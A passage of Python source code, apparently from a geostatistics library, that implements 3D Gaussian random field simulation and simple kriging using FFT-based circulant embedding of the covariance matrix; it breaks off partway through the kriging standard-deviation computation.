:param conditioningMethod:
(int) indicates which method is used to update simulation
for accounting conditioning data.
Let
A: index of conditioning nodes
B: index of non-conditioning nodes
Zobs: vector of values of the unconditional
simulation Z at conditioning nodes
and
+ +
| rAA rAB |
r = | |
| rBA rBB |
+ +
the covariance matrix, where index A (resp. B) refers
to conditioning (resp. non-conditioning) index in the
grid. Then, an unconditional simulation Z is updated
into a conditional simulation ZCond as follows:
Let
ZCond[A] = Zobs
ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
(that is the update consists in adding the kriging
estimates of the residues to the unconditional
simulation); possible values for conditioningMethod:
1: method CondtioningA:
the matrix M = rBA * rAA^(-1) is explicitly
computed (warning: could require large amount
of memory), then all the simulations are updated
by a sum and a multiplication by the matrix M
2: method ConditioningB:
for each simulation: the linear system
rAA * x = Zobs - Z[A]
is solved and then, the multiplication by rBA
is done via fft
:param measureErrVar:
(float >=0) measurement error variance; we assume that
the error on conditioining data follows the distrubution
N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
considered instead of rAA for stabilizing the linear
system for this matrix.
(Ignored if x is None, i.e. unconditional simulations)
:param tolInvKappa: (float >0) used only for conditioning, the simulation is
stopped if the inverse of the condition number of rAA
is above tolInvKappa
:param printInfo: (bool) indicates if some info is printed in stdout
:return grf: (4-dimensional array of dim nreal x n3 x n2 x n1) nreal GRFs
with n1 = nx, n2 = ny, n3 = nz if crop = True,
and n1 >= nx, n2 >= ny, n3 >= nz otherwise;
grf[i] is the i-th realization
NOTES:
Discrete Fourier Transform (DFT) of an array x of dim N1 x N2 x N3 is given by
c = DFT(x) = F * x
where F is the the (N1*N2*N3) x (N1*N2*N3) matrix with coefficients
F(j,k) = [exp( -i*2*pi*(j^t*k)/(N1*N2*N3) )], j=(j1,j2,j3), k=(k1,k2,k3) in G,
and
G = {n=(n1,n2,n3), 0 <= n1 <= N1-1, 0 <= n2 <= N2-1, 0 <= n3 <= N3-1}
denotes the indices grid
and where we use the bijection
(n1,n2,n3) in G -> n1 + n2 * N1 + n3 * N1 * N2 in {0,...,N1*N2*N3-1},
between the multiple-indices and the single indices
With N = N1*N2*N3, we have
F^(-1) = 1/N * F^(*)
where ^(*) denotes the conjugate transpose
Let
Q = 1/N^(1/2) * F
Then Q is unitary, i.e. Q^(-1) = Q^(*)
Then, we have
DFT = F = N^(1/2) * Q
DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
Using numpy package in python3, we have
numpy.fft.fftn() = DFT
numpy.fft.ifftn() = DFT^(-1)
"""
# Check first argument and get covariance function
if cov_model.__class__.__name__ == 'function':
# covariance function is given
cov_func = cov_model
range_known = False
elif cov_model.__class__.__name__ == 'CovModel3D':
cov_func = cov_model.func() # covariance function
range_known = True
else:
print("ERROR: 'cov_model' (first argument) is not valid")
return
# Number of realization(s)
nreal = int(nreal) # cast to int if needed
if nreal <= 0:
if printInfo:
print('GRF3D: nreal = 0: nothing to do!')
return()
if printInfo:
print('GRF3D: Preliminary computation...')
#### Preliminary computation ####
nx, ny, nz = dimension
dx, dy, dz = spacing
# ox, oy, oz = origin
nxy = nx*ny
nxyz = nxy * nz
if method not in (1, 2, 3):
print('ERROR (GRF3D): invalid method')
return
if method == 2:
print('ERROR (GRF3D): Unconditional simulation: "method=2" not implemented...')
return
if x is not None:
if conditioningMethod not in (1, 2):
print('ERROR (GRF3D): invalid method for conditioning')
return
x = np.asarray(x).reshape(-1,3) # cast in 1-dimensional array if needed
v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed
mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
if mean.size != 1:
if mean.size != nxyz:
print('ERROR (GRF3D): number of entry for "mean"...')
return
mean = np.asarray(mean).reshape(nz, ny, nx) # cast in 3-dimensional array of same shape as grid
if var is not None:
var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
if var.size != 1:
if var.size != nxyz:
print('ERROR (GRF3D): number of entry for "var"...')
return
var = np.asarray(var).reshape(nz, ny, nx) # cast in 3-dimensional array of same shape as grid
if not crop:
if x is not None: # conditional simulation
print('ERROR (GRF3D): "no crop" is not valid with conditional simulation')
return
if mean.size > 1:
print('ERROR (GRF3D): "no crop" is not valid with non stationary mean')
return
if var is not None and var.size > 1:
print('ERROR (GRF3D): "no crop" is not valid with non stationary variance')
return
if extensionMin is None:
# default extensionMin
if range_known:
# ... based on range of covariance model
extensionMin = [extension_min(r, n, s) for r, n, s in zip(cov_model.rxyz(), dimension, spacing)]
else:
# ... based on dimension
extensionMin = [nx-1, ny-1, nz-1] # default
N1min = nx + extensionMin[0]
N2min = ny + extensionMin[1]
N3min = nz + extensionMin[2]
if printInfo:
print('GRF3D: Computing circulant embedding...')
# Circulant embedding of the covariance matrix
# --------------------------------------------
# The embedding matrix is a (N1,N2,N3)-nested block circulant matrix, computed from
# the covariance function.
# To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
# we choose
# N1 = 2^g1 (a power of 2), with N1 >= N1min
# N2 = 2^g2 (a power of 2), with N2 >= N2min
# N3 = 2^g3 (a power of 2), with N3 >= N3min
g1 = int(np.ceil(np.log2(N1min)))
g2 = int(np.ceil(np.log2(N2min)))
g3 = int(np.ceil(np.log2(N3min)))
N1 = int(2**g1)
N2 = int(2**g2)
N3 = int(2**g3)
if printInfo:
print('GRF3D: Embedding dimension: {} x {} x {}'.format(N1, N2, N3))
N12 = N1*N2
N = N12 * N3
# ccirc: coefficient of the embedding matrix, (N3, N2, N1) array
L1 = int (N1/2)
L2 = int (N2/2)
L3 = int (N3/2)
h1 = np.arange(-L1, L1, dtype=float) * dx # [-L1 ... 0 ... L1-1] * dx
h2 = np.arange(-L2, L2, dtype=float) * dy # [-L2 ... 0 ... L2-1] * dy
h3 = np.arange(-L3, L3, dtype=float) * dz # [-L3 ... 0 ... L3-1] * dz
hh = np.meshgrid(h2, h3, h1) # as this! hh[i]: (N3, N2, N1) array
# hh[0]: y-coord, hh[1]: z-coord, hh[2]: x-coord
ccirc = cov_func(np.hstack((hh[2].reshape(-1,1), hh[0].reshape(-1,1), hh[1].reshape(-1,1))))
ccirc.resize(N3, N2, N1)
del(h1, h2, h3, hh)
# ...shift first L1 index to the end of the axis 2:
ind = np.arange(L1)
ccirc = ccirc[:,:, np.hstack((ind+L1, ind))]
# ...shift first L2 index to the end of the axis 1:
ind = np.arange(L2)
ccirc = ccirc[:, np.hstack((ind+L2, ind)), :]
# ...shift first L3 index to the end of the axis 0:
ind = np.arange(L3)
ccirc = ccirc[np.hstack((ind+L3, ind)), :,:]
del(ind)
if printInfo:
print('GRF3D: Computing FFT of circulant matrix...')
# Compute the Discrete Fourier Transform (DFT) of ccric, via FFT
# --------------------------------------------------------------
# The (3-dimensional) DFT coefficients
# lam = DFT(ccirc) = {lam(k1,k2,k3), 0<=k1<=N1-1, 0<=k2<=N2-1, 0<=k3<=N3-1}
# are the eigen values of the embedding matrix.
# We have:
# a) lam are real coefficients, because the embedding matrix is symmetric
# b) lam(k1,k2,k3) = lam(N1-k1,N2-k2,N3-k3), 1<=k1<=N1-1, 1<=k2<=N2-1, 1<=k3<=N3-1, because the coefficients ccirc are real
lam = np.real(np.fft.fftn(ccirc))
# ...note that the imaginary parts are equal to 0
# Eventual use of approximate embedding
# -------------------------------------
# If some DFT coefficients are negative, then set them to zero
# and update them to fit the marginals distribution (approximate embedding)
if np.min(lam) < 0:
lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
# Take the square root of the (updated) DFT coefficients
# ------------------------------------------------------
lamSqrt = np.sqrt(lam)
if x is None or conditioningMethod == 1:
del(lam)
# For specified variance
# ----------------------
# Compute updating factor
if var is not None:
varUpdate = np.sqrt(var/cov_func(np.zeros(3)))
# Dealing with conditioning
# -------------------------
if x is not None:
if printInfo:
print('GRF3D: Treatment of conditioning data...')
# Compute the part rAA of the covariance matrix
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
if printInfo:
print('GRF3D: Computing covariance matrix (rAA) for conditioning locations...')
# Compute
# indc: node index of conditioning node (nearest node)
indc = np.asarray(np.floor((x-origin)/spacing), dtype=int) # multiple-indices: size n x 3
ix, iy, iz = indc[:, 0], indc[:, 1], indc[:, 2]
if sum(ix < 0) > 0 or sum(ix >= nx):
print('ERROR (GRF3D): a conditioning point is out of the grid (x-direction)')
return
if sum(iy < 0) > 0 or sum(iy >= ny):
print('ERROR (GRF3D): a conditioning point is out of the grid (y-direction)')
return
if sum(iz < 0) > 0 or sum(iz >= nz):
print('ERROR (GRF3D): a conditioning point is out of the grid (z-direction)')
return
indc = ix + iy * nx + iz * nxy # single-indices
if len(np.unique(indc)) != len(x):
print('ERROR (GRF3D): more than one conditioning point in a same grid cell')
nc = len(x)
# rAA
rAA = np.zeros((nc, nc))
diagEntry = ccirc[0, 0, 0] + measureErrVar
for i in range(nc):
rAA[i,i] = diagEntry
for j in range(i+1, nc):
rAA[i,j] = ccirc[np.mod(iz[j]-iz[i], N3), np.mod(iy[j]-iy[i], N2), np.mod(ix[j]-ix[i], N1)]
rAA[j,i] = rAA[i,j]
# Test if rAA is almost singular...
if 1./np.linalg.cond(rAA) < tolInvKappa:
print('ERROR (GRF3D): conditioning issue: condition number of matrix rAA is too big')
return
# Compute:
# indnc: node index of non-conditioning node (nearest node)
indnc = np.asarray(np.setdiff1d(np.arange(nxyz), indc), dtype=int)
nnc = len(indnc)
kz = np.floor_divide(indnc, nxy)
kk = np.mod(indnc, nxy)
ky = np.floor_divide(kk, nx)
kx = np.mod(kk, nx)
del(kk)
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF3D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')
# Compute the parts rBA of the covariance matrix (see above)
# rBA
rBA = np.zeros((nnc, nc))
for j in range(nc):
rBA[:,j] = ccirc[np.mod(iz[j] - kz, N3), np.mod(iy[j] - ky, N2), np.mod(ix[j] - kx, N1)]
if printInfo:
print('GRF3D: Computing rBA * rAA^(-1)...')
# compute rBA * rAA^(-1)
rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))
del(rAA, rBA)
# If a variance var is specified, then the matrix r should be updated
# by the following operation:
# diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
# Hence, if a non stationary variance is specified,
# the matrix rBA * rAA^(-1) should be consequently updated
# by multiplying its columns by 1/varUpdate[indc] and its rows by varUpdate[indnc]
if var is not None and var.size > 1:
rBArAAinv = np.transpose(varUpdate.reshape(-1)[indnc] * np.transpose(1./varUpdate.reshape(-1)[indc] * rBArAAinv))
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
if printInfo:
print('GRF3D: Computing index in the embedding grid for non-conditioning / conditioning locations...')
# Compute index in the embedding grid for indc and indnc
# (to allow use of fft)
indcEmb = iz * N12 + iy * N1 + ix
indncEmb = kz * N12 + ky * N1 + kx
del(ix, iy, iz, kx, ky, kz)
del(ccirc)
#### End of preliminary computation ####
# Unconditional simulation
# ========================
# Method A: Generating one real GRF Z
# --------
# 1. Generate a real gaussian white noise W ~ N(0,1) on G (3D grid)
# 2. Compute Z = Q^(*) D Q * W
# [OR: Z = Q D Q^(*) * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = DFT^(-1)(D * DFT(W))
# [OR: Z = DFT(D * DFT^(-1)(W))]
#
# Method B: Generating one real GRF Z
# --------
# Not implemented
#
# Method C: Generating two independent real GRFs Z1, Z2
# --------
# (If nreal is odd, the last realization is generated using method A.)
# 1. Generate two independent real gaussian white noises W1,W2 ~ N(0,1) on G (3D grid)
# and let W = W1 + i * W2 (complex value)
# 2. Compute Z = Q^(*) D * W
# [OR: Z = Q D * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = N^(1/2) * DFT^(-1)(D * W)
# [OR: Z = 1/N^(1/2) * DFT(D * W)]
# Then the real and imaginary parts of Z are two independent GRFs
if crop:
grfNx, grfNy, grfNz = nx, ny, nz
else:
grfNx, grfNy, grfNz = N1, N2, N3
grf = np.zeros((nreal, grfNz, grfNy, grfNx))
if method == 1:
# Method A
# --------
for i in range(nreal):
if printInfo:
print('GRF3D: Unconditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
W = np.random.normal(size=(N3, N2, N1))
Z = np.fft.ifftn(lamSqrt * np.fft.fftn(W))
# ...note that Im(Z) = 0
grf[i] = np.real(Z[0:grfNz, 0:grfNy, 0:grfNx])
elif method == 2:
# Method B
# --------
print('ERROR (GRF3D): Unconditional simulation: "method=2" not implemented...')
return
elif method == 3:
# Method C
# --------
for i in np.arange(0, nreal-1, 2):
if printInfo:
print('GRF3D: Unconditional simulation {:4d}-{:4d} of {:4d}...'.format(i+1, i+2, nreal))
W = np.array(np.random.normal(size=(N3, N2, N1)), dtype=complex)
W.imag = np.random.normal(size=(N3, N2, N1))
Z = np.sqrt(N) * np.fft.ifftn(lamSqrt * W)
# Z = 1/np.sqrt(N) * np.fft.fftn(lamSqrt * W)] # see above: [OR:...]
grf[i] = np.real(Z[0:grfNz, 0:grfNy, 0:grfNx])
grf[i+1] = np.imag(Z[0:grfNz, 0:grfNy, 0:grfNx])
if np.mod(nreal, 2) == 1:
if printInfo:
print('GRF3D: Unconditional simulation {:4d} of {:4d}...'.format(nreal, nreal))
W = np.random.normal(size=(N3, N2, N1))
Z = np.fft.ifftn(lamSqrt * np.fft.fftn(W))
# ...note that Im(Z) = 0
grf[nreal-1] = np.real(Z[0:grfNz, 0:grfNy, 0:grfNx])
if var is not None:
grf = varUpdate * grf
grf = mean + grf
# Conditional simulation
# ----------------------
# Let
# A: index of conditioning nodes
# B: index of non-conditioning nodes
# Zobs: vector of values at conditioning nodes
# and
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# the covariance matrix, where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
#
# Then, from an unconditional simulation Z, we retrieve a conditional
# simulation ZCond as follows.
# Let
# ZCond[A] = Zobs
# ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
if x is not None:
# We work with single indices...
grf.resize(nreal, grfNx*grfNy*grfNz)
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF3D: Updating conditional simulations...')
# Update all simulations at a time,
# use the matrix rBA * rAA^(-1) already computed
grf[:,indnc] = grf[:,indnc] + np.transpose(np.dot(rBArAAinv, np.transpose(v - grf[:,indc])))
grf[:,indc] = v
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
# Update each simulation successively as follows:
# - solve rAA * x = Zobs - z[A]
# - do the multiplication rBA * x via the circulant embedding of the
# covariance matrix (using fft)
rAAinvResiduEmb = np.zeros(N3*N2*N1)
for i in range(nreal):
if printInfo:
print('GRF3D: Updating conditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
# Compute residue
residu = v - grf[i,indc]
# ... update if non stationary variance is specified
if var is not None and var.size > 1:
residu = 1./varUpdate.reshape(-1)[indc] * residu
# Compute
# x = rAA^(-1) * residu, and then
# Z = rBA * x via the circulant embedding of the covariance matrix
rAAinvResiduEmb[indcEmb] = np.linalg.solve(rAA, residu)
Z = np.fft.ifftn(lam * np.fft.fftn(rAAinvResiduEmb.reshape(N3, N2, N1)))
# ...note that Im(Z) = 0
Z = np.real(Z.reshape(-1)[indncEmb])
# ... update if non stationary covariance is specified
if var is not None and var.size > 1:
Z = varUpdate.reshape(-1)[indnc] * Z
grf[i, indnc] = grf[i, indnc] + Z
grf[i, indc] = v
# Reshape grf as initially
grf.resize(nreal, grfNz, grfNy, grfNx)
return (grf)
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def krige3D(x, v, cov_model, dimension, spacing, origin=[0., 0., 0.],
mean=0, var=None,
extensionMin=None,
conditioningMethod=1, # note: set conditioningMethod=2 if unable to allocate memory
measureErrVar=0., tolInvKappa=1.e-10,
computeKrigSD=True,
printInfo=True):
"""
Computes kriging estimates and standard deviation in 3D via FFT.
It is a simple kriging
- of value v at location x,
- based on the covariance model / function,
- with a specified mean (mean) and variance (var), which can be non stationary
Notes:
1) For reproducing covariance model, the dimension of field/domain should be large
enough; let K an integer such that K*spacing is greater or equal to the
correlation range, then
- correlation accross opposite border should be removed by extending
the domain sufficiently, i.e.
extensionMin >= K - 1
- two nodes could not be correlated simultaneously regarding both distances
between them (with respect to the periodic grid), i.e. one should have
i.e. one should have
dimension+extensionMin >= 2*K - 1,
To sum up, extensionMin should be chosen such that
dimension+extensionMin >= max(dimension, K) + K - 1
i.e.
extensionMin >= max(K-1,2*K-dimension-1)
2) For large data set:
- conditioningMethod should be set to 2 for using FFT
- measureErrVar could be set to a small positive value to stabilize
the covariance matrix (solving linear system)
:param x: (2-dimensional array array of dim n x 3) coordinate of data points
:param v: (1-dimensional array length n) value at data points
:param cov_model: covariance model, it can be:
(function) covariance function f(h), where
h: (2-dimensional array of dim n x 3, or
1-dimensional array of dim 3) are 3D-lag(s)
(CovModel3D class) covariance model in 3D, see
definition of the class in module geone.covModel
:param dimension: (sequence of 3 ints) [nx, ny, nz], number of cells
in x-, y-, z-axis direction
:param spacing: (sequence of 3 float) [dx, dy, dz], spacing between
two adjacent cells in x-, y-, z-axis direction
:param origin: (sequence of 3 float) [ox, oy, oz], origin of the 2D field
- used for localizing the conditioning points
:param nreal: (int) number of realizations
:param mean: (float or ndarray) mean of the GRF:
- scalar for stationary mean
- ndarray for non stationary mean, must contain
nx*ny*nz values (reshaped if needed)
:param var: (float or ndarray or None) variance of the GRF,
if not None: variance of GRF is updated
depending on the specified variance and the covariance
function, otherwise: only the covariance function is
used
- scalar for stationary variance
- array for non stationary variance, must contain
nx*ny*nz values (reshaped if needed)
:param extensionMin: (sequence of 3 ints) minimal extension in nodes in
in x-, y-, z-axis direction for embedding (see above)
None for default (automatically computed, based
on the ranges if covariance model class is given
as third argument)
:param conditioningMethod:
(int) indicates which method is used to perform kriging.
Let
A: index of conditioning (data) nodes
B: index of non-conditioning nodes
and
+ +
| rAA rAB |
r = | |
| rBA rBB |
+ +
the covariance matrix, where index A (resp. B) refers
to conditioning (resp. non-conditioning) index in the
grid. Then, thre kriging estimates and variance are
krig[B] = mean + rBA * rAA^(-1) * (v - mean)
krigVar[B] = diag(rBB - rBA * rAA^(-1) * rAB)
The computation is done in a way depending on the
following possible values for conditioningMethod:
1: method CondtioningA:
the matrices rBA, RAA^(-1) are explicitly
computed (warning: could require large amount
of memory), then all the simulations are updated
by a sum and a multiplication by the matrix M
2: method ConditioningB:
for kriging estimates:
the linear system
rAA * y = (v - mean)
is solved, and then
mean + rBA*y
is computed
for kriging variances:
for each column u[j] of rAB, the linear
system
rAA * y = u[j]
is solved, and then
rBB[j,j] - y^t*y
is computed
:param measureErrVar:
(float >=0) measurement error variance; we assume that
the error on conditioining data follows the distrubution
N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
considered instead of rAA for stabilizing the linear
system for this matrix.
:param tolInvKappa: (float >0) the function is stopped if the inverse of
the condition number of rAA is above tolInvKappa
:param computeKrigSD:
(bool) indicates if the standard deviation of kriging is computed
:param printInfo: (bool) indicates if some info is printed in stdout
:return ret: two possible cases:
ret = [krig, krigSD] if computeKrigSD is equal to True
ret = krig if computeKrigSD is equal to False
where
krig: (3-dimensional array of dim nz x ny x nx)
kriging estimates
krigSD: (3-dimensional array of dim nz x ny x nx)
kriging standard deviation
NOTES:
Discrete Fourier Transform (DFT) of an array x of dim N1 x N2 x N3 is given by
c = DFT(x) = F * x
where F is the the (N1*N2*N3) x (N1*N2*N3) matrix with coefficients
F(j,k) = [exp( -i*2*pi*(j^t*k)/(N1*N2*N3) )], j=(j1,j2,j3), k=(k1,k2,k3) in G,
and
G = {n=(n1,n2,n3), 0 <= n1 <= N1-1, 0 <= n2 <= N2-1, 0 <= n3 <= N3-1}
denotes the indices grid
and where we use the bijection
(n1,n2,n3) in G -> n1 + n2 * N1 + n3 * N1 * N2 in {0,...,N1*N2*N3-1},
between the multiple-indices and the single indices
With N = N1*N2*N3, we have
F^(-1) = 1/N * F^(*)
where ^(*) denotes the conjugate transpose
Let
Q = 1/N^(1/2) * F
Then Q is unitary, i.e. Q^(-1) = Q^(*)
Then, we have
DFT = F = N^(1/2) * Q
DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
Using numpy package in python3, we have
numpy.fft.fftn() = DFT
numpy.fft.ifftn() = DFT^(-1)
"""
# Check third argument and get covariance function
if cov_model.__class__.__name__ == 'function':
# covariance function is given
cov_func = cov_model
range_known = False
elif cov_model.__class__.__name__ == 'CovModel3D':
cov_func = cov_model.func() # covariance function
range_known = True
else:
print("ERROR: 'cov_model' (third argument) is not valid")
return
# Check conditioning method
if conditioningMethod not in (1, 2):
print('ERROR (KRIGE3D): invalid method!')
return
nx, ny, nz = dimension
dx, dy, dz = spacing
# ox, oy, oz = origin
nxy = nx*ny
nxyz = nxy * nz
x = np.asarray(x).reshape(-1,3) # cast in 1-dimensional array if needed
v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed
mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
if mean.size != 1:
if mean.size != nxyz:
print('ERROR (KRIGE3D): number of entry for "mean"...')
return
mean = np.asarray(mean).reshape(nz, ny, nx) # cast in 3-dimensional array of same shape as grid
if var is not None:
var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
if var.size != 1:
if var.size != nxyz:
print('ERROR (KRIGE3D): number of entry for "var"...')
return
var = np.asarray(var).reshape(nz, ny, nx) # cast in 3-dimensional array of same shape as grid
if extensionMin is None:
# default extensionMin
if range_known:
# ... based on range of covariance model
extensionMin = [extension_min(r, n, s) for r, n, s in zip(cov_model.rxyz(), dimension, spacing)]
else:
# ... based on dimension
extensionMin = [nx-1, ny-1, nz-1] # default
N1min = nx + extensionMin[0]
N2min = ny + extensionMin[1]
N3min = nz + extensionMin[2]
if printInfo:
print('KRIGE3D: Computing circulant embedding...')
# Circulant embedding of the covariance matrix
# --------------------------------------------
# The embedding matrix is a (N1,N2,N3)-nested block circulant matrix, computed from
# the covariance function.
# To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
# we choose
# N1 = 2^g1 (a power of 2), with N1 >= N1min
# N2 = 2^g2 (a power of 2), with N2 >= N2min
# N3 = 2^g3 (a power of 2), with N3 >= N3min
g1 = int(np.ceil(np.log2(N1min)))
g2 = int(np.ceil(np.log2(N2min)))
g3 = int(np.ceil(np.log2(N3min)))
N1 = int(2**g1)
N2 = int(2**g2)
N3 = int(2**g3)
if printInfo:
print('KRIGE3D: Embedding dimension: {} x {} x {}'.format(N1, N2, N3))
N12 = N1*N2
N = N12 * N3
# ccirc: coefficient of the embedding matrix, (N3, N2, N1) array
L1 = int (N1/2)
L2 = int (N2/2)
L3 = int (N3/2)
h1 = np.arange(-L1, L1, dtype=float) * dx # [-L1 ... 0 ... L1-1] * dx
h2 = np.arange(-L2, L2, dtype=float) * dy # [-L2 ... 0 ... L2-1] * dy
h3 = np.arange(-L3, L3, dtype=float) * dz # [-L3 ... 0 ... L3-1] * dz
hh = np.meshgrid(h2, h3, h1) # as this! hh[i]: (N3, N2, N1) array
# hh[0]: y-coord, hh[1]: z-coord, hh[2]: x-coord
ccirc = cov_func(np.hstack((hh[2].reshape(-1,1), hh[0].reshape(-1,1), hh[1].reshape(-1,1))))
ccirc.resize(N3, N2, N1)
del(h1, h2, h3, hh)
# ...shift first L1 index to the end of the axis 2:
ind = np.arange(L1)
ccirc = ccirc[:,:, np.hstack((ind+L1, ind))]
# ...shift first L2 index to the end of the axis 1:
ind = np.arange(L2)
ccirc = ccirc[:, np.hstack((ind+L2, ind)), :]
# ...shift first L3 index to the end of the axis 0:
ind = np.arange(L3)
ccirc = ccirc[np.hstack((ind+L3, ind)), :,:]
del(ind)
if printInfo:
print('KRIGE3D: Computing FFT of circulant matrix...')
# Compute the Discrete Fourier Transform (DFT) of ccric, via FFT
# --------------------------------------------------------------
# The (3-dimensional) DFT coefficients
# lam = DFT(ccirc) = {lam(k1,k2,k3), 0<=k1<=N1-1, 0<=k2<=N2-1, 0<=k3<=N3-1}
# are the eigen values of the embedding matrix.
# We have:
# a) lam are real coefficients, because the embedding matrix is symmetric
# b) lam(k1,k2,k3) = lam(N1-k1,N2-k2,N3-k3), 1<=k1<=N1-1, 1<=k2<=N2-1, 1<=k3<=N3-1, because the coefficients ccirc are real
lam = np.real(np.fft.fftn(ccirc))
# ...note that the imaginary parts are equal to 0
# Eventual use of approximate embedding
# -------------------------------------
# If some DFT coefficients are negative, then set them to zero
# and update them to fit the marginals distribution (approximate embedding)
if np.min(lam) < 0:
lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
# Take the square root of the (updated) DFT coefficients
# ------------------------------------------------------
lamSqrt = np.sqrt(lam)
# For specified variance
# ----------------------
# Compute updating factor
if var is not None:
varUpdate = np.sqrt(var/cov_func(np.zeros(3)))
# Kriging
# -------
# Let
# A: index of conditioning nodes
# B: index of non-conditioning nodes
# Zobs: vector of values at conditioning nodes
# and
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# the covariance matrix, where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
#
# Then, the kriging estimates are
# mean + rBA * rAA^(-1) * (v - mean)
# and the kriging standard deviation
# diag(rBB - rBA * rAA^(-1) * rAB)
# Compute the part rAA of the covariance matrix
# Note: if a variance var is specified, then the matrix r should be updated
# by the following operation:
# diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
# which is accounting in the computation of kriging estimates and standard
# deviation below
if printInfo:
print('KRIGE3D: Computing covariance matrix (rAA) for conditioning locations...')
# Compute
# indc: node index of conditioning node (nearest node)
indc = np.asarray(np.floor((x-origin)/spacing), dtype=int) # multiple-indices: size n x 3
ix, iy, iz = indc[:, 0], indc[:, 1], indc[:, 2]
if sum(ix < 0) > 0 or sum(ix >= nx):
print('ERROR (KRIGE3D): a conditioning point is out of the grid (x-direction)')
return
if sum(iy < 0) > 0 or sum(iy >= ny):
print('ERROR (KRIGE3D): a conditioning point is out of the grid (y-direction)')
return
if sum(iz < 0) > 0 or sum(iz >= nz):
print('ERROR (KRIGE3D): a conditioning point is out of the grid (z-direction)')
return
indc = ix + iy * nx + iz * nxy # single-indices
if len(np.unique(indc)) != len(x):
print('ERROR (KRIGE3D): more than one conditioning point in a same grid cell')
nc = len(x)
# rAA
rAA = np.zeros((nc, nc))
diagEntry = ccirc[0, 0, 0] + measureErrVar
for i in range(nc):
rAA[i,i] = diagEntry
for j in range(i+1, nc):
rAA[i,j] = ccirc[np.mod(iz[j]-iz[i], N3), np.mod(iy[j]-iy[i], N2), np.mod(ix[j]-ix[i], N1)]
rAA[j,i] = rAA[i,j]
# Test if rAA is almost singular...
if 1./np.linalg.cond(rAA) < tolInvKappa:
print('ERROR (GRF3D): conditioning issue: condition number of matrix rAA is too big')
return
# Compute:
# indnc: node index of non-conditioning node (nearest node)
indnc = np.asarray(np.setdiff1d(np.arange(nxyz), indc), dtype=int)
nnc = len(indnc)
kz = np.floor_divide(indnc, nxy)
kk = np.mod(indnc, nxy)
ky = np.floor_divide(kk, nx)
kx = np.mod(kk, nx)
del(kk)
# Initialize
krig = np.zeros(nz*ny*nx)
if computeKrigSD:
krigSD = np.zeros(nz*ny*nx)
if mean.size == 1:
v = v - mean
else:
v = v - mean.reshape(-1)[indc]
if var is not None and var.size > 1:
v = 1./varUpdate.reshape(-1)[indc] * v
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('KRIGE3D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')
# Compute the parts rBA of the covariance matrix (see above)
# rBA
rBA = np.zeros((nnc, nc))
for j in range(nc):
rBA[:,j] = ccirc[np.mod(iz[j] - kz, N3), np.mod(iy[j] - ky, N2), np.mod(ix[j] - kx, N1)]
del(ix, iy, iz, kx, ky, kz)
del(ccirc)
if printInfo:
print('KRIGE3D: Computing rBA * rAA^(-1)...')
# compute rBA * rAA^(-1)
rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))
del(rAA)
if not computeKrigSD:
del(rBA)
# Compute kriging estimates
if printInfo:
print('KRIGE3D: computing kriging estimates...')
krig[indnc] = np.dot(rBArAAinv, v)
krig[indc] = v
if computeKrigSD:
# Compute kriging standard deviation
if printInfo:
print('KRIGE3D: computing kriging standard deviation ...')
for j in range(nnc):
krigSD[indnc[j]] = np.dot(rBArAAinv[j,:], rBA[j,:])
krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))
del(rBA)
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
if not computeKrigSD:
del(ccirc)
if printInfo:
print('KRIGE3D: Computing index in the embedding grid for non-conditioning / conditioning locations...')
# Compute index in the embedding grid for indc and indnc
# (to allow use of fft)
indcEmb = iz * N12 + iy * N1 + ix
indncEmb = kz * N12 + ky * N1 + kx
# Compute kriging estimates
if printInfo:
print('KRIGE3D: computing kriging estimates...')
# Compute
# u = rAA^(-1) * v, and then
# Z = rBA * u via the circulant embedding of the covariance matrix
uEmb = np.zeros(N3*N2*N1)
uEmb[indcEmb] = np.linalg.solve(rAA, v)
Z = np.fft.ifftn(lam * np.fft.fftn(uEmb.reshape(N3, N2, N1)))
# ...note that Im(Z) = 0
krig[indnc] = np.real(Z.reshape(-1)[indncEmb])
krig[indc] = v
if computeKrigSD:
# Compute kriging standard deviation
if printInfo:
print('KRIGE3D: computing kriging standard deviation ...')
for j in range(nnc):
